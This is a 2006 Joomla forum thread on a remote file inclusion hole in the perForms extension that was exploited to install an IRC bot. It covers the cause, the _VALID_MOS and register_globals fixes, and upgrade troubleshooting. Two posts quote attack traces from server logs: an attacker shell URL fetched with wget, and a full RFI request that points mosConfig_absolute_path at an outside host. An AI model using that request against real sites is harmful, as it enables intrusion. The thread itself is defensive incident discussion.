The Joomla! Forum ™





Post new topic Reply to topic  [ 31 posts ]  Go to page 1, 2  Next
Author Message
PostPosted: Thu Jul 13, 2006 3:25 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
Please read here.

Short: Installs IRC-Bot, infected yet 100 servers and growing fast.

components/com_perform/perform.php


Last edited by RobS on Wed Jul 19, 2006 5:01 am, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 3:30 pm 
User avatar
Joomla! Master
Joomla! Master
Online

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10475
Location: Leeds, UK
Any chance of a translation please or at least a summary

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 3:31 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
Quote:
Joomla-extension perForms acute at risk.

A botnet operator uses currently a yet unknown vulnerability in the joomla extension perForms, to install an IRC bot. Infected computers can be identified by a running process with name httpdse and an IRC connection outgoing from it. The used programming fault is in the php file components/com_perform/perform.php. It includes external files by the global parameter $mosConfig_absolute_path, without checking for manipulation before. An attacker can under circumstances load arbitrary malcious php code, if the webserver is running with register_globals=on. The botnet uses google to search for other possible victims. According to Nepenthes developer Markus Kötter the botnet currently is about 100 compromised servers and is growing.

A comparable vulnerability was lately discovered in the extension Galleria. Possibly it is also present in other modules. The promlem with vulnerable extentions is allready known by the joomla developers. They recommend to all joomla users, to check php files of theire extensions. They should at the beginning have a line as

defined( '_VALID_MOS' ) or die( 'Direct Access not allowed.' );

which shoud in case be added when missing. The code secures scripts from a direct call how it is necessary for most exploits. Also it is imperative recommended to run the PHP-webserver with register_globals=off. This setting in php.ini protects from a big part of the known and yet unknown vulnerabilities in in PHP-scripts. (cr/c't)


Last edited by Anonymous on Thu Jul 13, 2006 4:08 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 3:38 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
-> I have logged "IRC-Bot" in my apache log .. dir:  http://muach.t35.com/tools/elite.php

insert shell , wget "IRC-Bot" ..  < 1 minute.

Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Last edited by gustavo on Thu Jul 13, 2006 3:41 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 4:43 pm 
Joomla! Intern
Joomla! Intern

Joined: Tue Nov 29, 2005 12:48 am
Posts: 83
If already compromised, will inserting

defined( '_VALID_MOS' ) or die( 'Direct Access not allowed.' );

in all .php files and turning off globals take care of this?


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 4:45 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
rden17 wrote:
If already compromised, will inserting

defined( '_VALID_MOS' ) or die( 'Direct Access not allowed.' );

in all .php files and turning off globals take care of this?


That would only fix the joomla installation, but not remove the IRC-Bot.

Read this.


Last edited by Anonymous on Thu Jul 13, 2006 4:48 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 5:18 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 16530
Not sure if anybody already has done this. I have contacted the developer in question about this issue.

_________________
Joomla forum global moderator.

Have fun


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 5:22 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
Tonie wrote:
Not sure if anybody already has done this. I have contacted the developer in question about this issue.


Probably not. I asked this question allready in the thread of another affected add-on.

Somebody should co-ordinate that all the respective developers get notified. Better twice than not at all.


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Thu Jul 13, 2006 6:58 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 9:58 am
Posts: 10069
Location: Hillerød - Denmark
Tonie wrote:
Not sure if anybody already has done this. I have contacted the developer in question about this issue.

A PM was sent earlier asking him to comment on this issue, with link to this thread.
To avoid others experience this, the extension is unpublished again from Extensions Directory until fix from developer.

_________________
Ole Bang Ottosen
redCOMPONENT Community Manager http://redcomponent.com
Personligt site www.ot2sen.dk
Dansk Joomla! support websted - joomla.dk


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Fri Jul 14, 2006 1:46 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Apr 20, 2006 9:04 pm
Posts: 101
Hi all!

In a good moment perForms, just released the version 2 beta of this component. I unistalled the firts version due the security issue but i really like this component. Will be secure this new version?

Namarië

_________________
All men die, not all men really live!


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Fri Jul 14, 2006 2:15 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
amaril, the developer is really the only person who can answer that question for you at the moment. ot2sen has already asked him to comment on the issue so hopefully he will be able to tell you soon.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Fri Jul 14, 2006 2:51 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Thu Aug 18, 2005 3:31 pm
Posts: 1176
Location: Battle Creek, MI
update with the latest package:

http://forge.joomla.org/sf/frs/do/viewR ... ms_v2_beta

_________________
Steven Pignataro
-- http://www.corephp.com


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Mon Jul 17, 2006 1:35 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Wed Feb 22, 2006 7:11 pm
Posts: 308
Location: Gothenburg, Kingdom of Sweden
And what? That means it is safe? Just uninstall the old one and install the new beta?

_________________
http://www.resoteket.se/directory/kina/Asien/kina/kinesiska_c185_m177/
http://www.skateboard.name


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Mon Jul 17, 2006 4:47 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Thu Aug 18, 2005 3:31 pm
Posts: 1176
Location: Battle Creek, MI
correct

There are some major fixes to the release that resolve the problems that where happening. (also some nice new features have been implemented - alot better then the way i was implementing them)

Kind regards,

_________________
Steven Pignataro
-- http://www.corephp.com


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Mon Jul 17, 2006 4:59 pm 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Thu Aug 18, 2005 5:39 am
Posts: 2040
Location: Aarhus, Denmark
The new version is great! Nice work.

_________________
Med venlig hilsen
Niklas Stephenson
www.ungt.dk - Open Source webløsninger, webudvikling og Joomla CMS


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Mon Jul 17, 2006 11:43 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Nov 20, 2005 2:29 pm
Posts: 25
v2-bet is safer, you should install that,
http://forum.joomla.org/index.php/topic ... #msg400101


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Tue Jul 18, 2006 5:04 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Wed Feb 22, 2006 7:11 pm
Posts: 308
Location: Gothenburg, Kingdom of Sweden
But what about my content, the forms I´ve created, will they disappear when I uninstall the old one?

_________________
http://www.resoteket.se/directory/kina/Asien/kina/kinesiska_c185_m177/
http://www.skateboard.name


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Tue Jul 18, 2006 6:40 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Nov 20, 2005 2:29 pm
Posts: 25
choomla wrote:
But what about my content, the forms I´ve created, will they disappear when I uninstall the old one?

yes, they will, but i am going to write an update script very soon.


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Tue Jul 18, 2006 7:19 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Wed Feb 22, 2006 7:11 pm
Posts: 308
Location: Gothenburg, Kingdom of Sweden
Great, then I'll unpublish mine and wait for that. Please post here when ready.

_________________
http://www.resoteket.se/directory/kina/Asien/kina/kinesiska_c185_m177/
http://www.skateboard.name


Top
 Profile  
 
 Post subject: Re: perForms
PostPosted: Tue Jul 18, 2006 1:06 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Thu Aug 18, 2005 3:31 pm
Posts: 1176
Location: Battle Creek, MI
this is all i did - i backed up the tables. Uninstalled performs - Deleted any left over tables. Installed the new performs. Inputted the old information into the database and i was good.

_________________
Steven Pignataro
-- http://www.corephp.com


Top
 Profile  
 
PostPosted: Wed Jul 19, 2006 4:06 pm 
Joomla! Intern
Joomla! Intern

Joined: Fri Sep 02, 2005 4:19 pm
Posts: 73
Is there a permission we can change to stop the hack and keep our forms running while we wait for an update script?


Top
 Profile  
 
PostPosted: Wed Jul 19, 2006 4:17 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Thu Aug 18, 2005 3:31 pm
Posts: 1176
Location: Battle Creek, MI
add the following to the top of performs.php

Code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

_________________
Steven Pignataro
-- http://www.corephp.com


Top
 Profile  
 
PostPosted: Thu Jul 20, 2006 10:31 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Apr 12, 2006 11:31 pm
Posts: 13
I restored and then upgraded after being hacked.

I just noticed that when I turn off register globals, the forms don't work.
:(


Top
 Profile  
 
PostPosted: Wed Aug 30, 2006 12:43 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Sep 07, 2005 7:31 pm
Posts: 34
I have same problem as Duncans When register globals turned off I cannot get form via the main menu item.

Register globals turned off by adding "php_flag register_globals off" in htaccess files

Any advice and help?

Norman

_________________
Norman Martin
www.newtraid.org
The Meeting Place for Volunteer Consultants and Clients


Top
 Profile  
 
PostPosted: Sat Sep 02, 2006 2:48 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Sep 07, 2005 7:31 pm
Posts: 34
Hi

I am still having same problem. Have reinstalled V 2 beta and all seem to work OK  but can get no form in front end  Used menu link URL with link as "index.php?option=com_performs&formid=1"  but no form displayed. This worked OK before register_globals was turned off. Please can anyone help?
Thanks in anticipation


nwm wrote:
I have same problem as Duncans When register globals turned off I cannot get form via the main menu item.

Register globals turned off by adding "php_flag register_globals off" in htaccess files

Any advice and help?

Norman

_________________
Norman Martin
www.newtraid.org
The Meeting Place for Volunteer Consultants and Clients


Top
 Profile  
 
PostPosted: Sat Sep 02, 2006 5:57 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Mon Sep 05, 2005 11:21 am
Posts: 338
Location: Nis, Serbia
I have error when try to instal v2. Anyone else with this problem?

_________________
http://www.pcigre.com -> game community


Top
 Profile  
 
PostPosted: Mon Sep 04, 2006 8:21 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 1:33 pm
Posts: 108
Location: Sebastopol
pcigre.com wrote:
I have error when try to instal v2. Anyone else with this problem?
Hm... v2 installs with no errors...

_________________
Joomlaportal.ru News, articles and tutorials
Joomlaforum.ru Russian Joomla Support Forum
Member of the Russian Joomla Translation Team


Top
 Profile  
 
PostPosted: Sun Sep 17, 2006 7:37 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Nov 28, 2005 5:00 pm
Posts: 34
Location: Mumbai, India
It works only if the RG_Emulation is ON. (Even when RG is OFF). If the RG_Emulation is Off , it does not display the form. Joomla security forums recommend RG=Off as well as RG_Emulation=Off. So what to do ? ???

_________________
A man is not finished when he is defeated,
He is finished when he quits


Top
 Profile  
 
PostPosted: Thu Sep 21, 2006 4:40 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Nov 28, 2005 5:00 pm
Posts: 34
Location: Mumbai, India
Quote from: RVFoley on September 03, 2006, 08:59:12 PM
Quote:
If you will open up performs.php in an editor and search for the term "formId", you need to change this to "formid".  Then it will work with register globals = off and with php.ini or your server php configuration set to register globals = off as well.



Thanks. This did the trick.  I was not able to use the form when it put off th RG_Emulation in my global.php when some hack attemts at performs were detected. With chaning as suggested above, the form has started working again even with RG = Off & RG_Emulation = Off.

Thanks once again.

_________________
A man is not finished when he is defeated,
He is finished when he quits


Top
 Profile  
 
PostPosted: Sat Dec 09, 2006 3:46 am 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Nov 28, 2005 5:00 pm
Posts: 34
Location: Mumbai, India
While going through my log files I found lines like :


/components/com_performs/performs.php?mosConfig_absolute_path=http://panoplanet.com/c.in? 
  Http Code: 404  Date: Dec 07 21:33:08  Http Version: HTTP/1.1  Size in Bytes: - 
  Referer: - 
  Agent: libwww-perl/5.79 


As this sounded problematic I have removed the component and deleted the file. Still these lines appeared today. My error log showed that the file acess to performs is giving errors.

What shall I do to rectify the problem and secure the system further. I had alredy taken the measures mentioned above like .htacces file upgradation, RG=off on the host, Emulation =off etc.etc.

_________________
A man is not finished when he is defeated,
He is finished when he quits


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 31 posts ]  Go to page 1, 2  Next



Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group